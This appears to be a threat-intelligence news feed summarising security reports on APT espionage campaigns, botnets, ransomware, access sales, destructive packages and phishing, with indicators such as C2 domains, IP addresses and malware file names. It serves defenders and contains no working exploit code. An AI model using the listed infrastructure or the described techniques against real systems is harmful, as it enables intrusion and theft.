A kernel-mode malicious driver (ProjectConfiguration.sys) signed with a leaked certificate was used to inject a new ToneShell backdoor into system processes and to protect malicious files, registry keys, and user-mode processes. This activity is attributed to the HoneyMyte APT and uses ToneShell connecting to avocadomechanism[.]com and potherbreference[.]com for C2 communication. #ToneShell #HoneyMyte
Tag: INITIAL ACCESS
Mustang Panda has developed a new kernel-mode rootkit driver to deliver the TONESHELL backdoor targeting Asian government entities. This sophisticated malware uses advanced stealth techniques, including driver signing with stolen certificates and hooking into system processes. #MustangPanda #TONESHELL…
CYFIRMA attributes a targeted multi-stage, fileless espionage campaign to APT36 (Transparent Tribe) that uses weaponized LNK files masquerading as PDFs to deliver HTA loaders and in-memory .NET deserialization payloads. The operation deploys configuration and RAT payloads (ReadOnly/WriteOnly -> ki2mtmkl.dll, iinneldc.dll), adapts persistence based on detected AV products, and maintains encrypted C2 communications to 2.56.10.86 for surveillance and data exfiltration. #APT36 #ReadOnly
CloudSEK recovered nine months of exposed RondoDoX/Rondo botnet C2 logs that document a three‑phase campaign evolving from reconnaissance and web‑app exploitation to large‑scale IoT botnet deployment and a December 2025 Next.js Server Actions RCE wave. The activity included automated command-injection and deserialization attacks, mass binary downloads (e.g., /nuts/poop) from C2s such as 51.81.104.115 and 5.255.121.141, and repeated exploitation of internet‑facing routers and Next.js servers #Rondo #NextJS
A ransomware attack on Romania’s largest coal-based energy producer, Oltenia Energy Complex, disrupted its IT systems but did not impact national energy operations. The Gentlemen ransomware group is suspected, with investigations underway and backups being used to restore affected systems. #GentlemenRansomware #OlteniaEnergyComplex
Cybercriminals are increasingly using sophisticated ClickFix tools like ErrTraffic v2 to trick users into executing malicious scripts through visual deceptions and fake glitches. These tools are sold cheaply, with high conversion rates, and can target multiple platforms while bypassing modern defenses. #ErrTraffic #ClickFix
A threat actor named “miya” claims to be selling access to a U.S. Student Information System used by around 150 educational institutions. The access includes root-level remote code execution on a Linux server through a firewall, posing a significant security risk. #Miya #StudentInformationSystem…
A China-linked APT group, Evasive Panda, conducted targeted cyber espionage campaigns using DNS poisoning to deliver the MgBot backdoor. The group has shown advanced techniques to evade detection and maintain persistence on victim systems. #EvasivePanda #MgBot…
A threat actor named miya is advertising the sale of initial access to a U.S.-based bank managing around $5 billion in assets, with access including Linux OS and firewall control at root level. This highlights the ongoing threat of cybercriminals targeting financial institutions for high-value cyber exploits. #InitialAccess #FinancialInstitutions…
Over the past year Socket observed a rise in destructive open-source packages that directly sabotage developer environments by deleting source code, breaking builds, and wiping repositories or CI artifacts. These packages—published to npm, PyPI, NuGet, and Go module indexes—used remote kill switches, time-delays, typosquatting/dependency confusion, and remote payload loaders to trigger targeted codebase destruction. #Socket #npm
CloudSEK’s TRIAD uncovered an Income-tax-themed phishing campaign targeting India that uses an NSIS installer to drop a signed Thunder.exe and a malicious libexpat.dll, leading to in-memory Donut shellcode execution and deployment of Valley RAT. The report attributes the campaign to Silver Fox APT and details a multi-stage kill chain with DLL hijacking, process hollowing, registry-resident plugins for persistence, and a three-tier C2 infrastructure. #SilverFox #ValleyRAT
A threat actor named miya claims to be selling initial access to a UAE-based financial solutions and insurance company. The compromised environment includes Linux systems, a firewall device with root permissions, remote code execution, and shell access. #Miya #UAEFinancial #InitialAccessSale…
RTO Scam Wave Continues: A Surge in Browser-Based e-Challan Phishing and Shared Fraud Infrastructure
CRIL uncovered a large-scale, browser-based phishing campaign impersonating India’s e-Challan/Parivahan services that delivers malicious links via SMS and harvests card data through fake payment pages. The same shared infrastructure also hosts BFSI and logistics-themed lures, with key artifacts including domains like echala[.]vip and hosting IPs 101[.]33[.]78[.]145 and 43[.]130[.]12[.]41. #eChallan #StateBankOfIndia
Operation PCPcat is a large-scale cyber espionage campaign exploiting vulnerabilities in React frameworks to compromise servers and steal credentials. The attack involves automated scans, exploit chains, and a central C2 server to maintain persistence and expand infection, posing significant risks to modern web infrastructure. #CVE-2025-29927 #CVE-2025-66478 #ReactServers #CredentialTheft #OperationPCPcat…
Three related IIS-originated intrusions demonstrated a consistent attacker workflow: exploitation of web application flaws to run commands via w3wp.exe, attempts to deploy a Go-based agent (agent.exe/815.exe/test.exe), use of LOLBins (certutil) to fetch payloads, and attempts to establish persistence via a Windows service (dllhost.exe/WindowsUpdate) and RMM tooling (GotoHTTP). Huntress telemetry and Windows Event Logs reveal multiple failed attempts, Defender detections/quarantines, and the actor changing tactics across incidents—initially retrying tooling, then applying Defender exclusions—while reusing infrastructure such as 110.172.104.95 and several client IPs. #Warlock #GotoHTTP #SparkRAT #ShellcodeRunner #Velociraptor #Huntress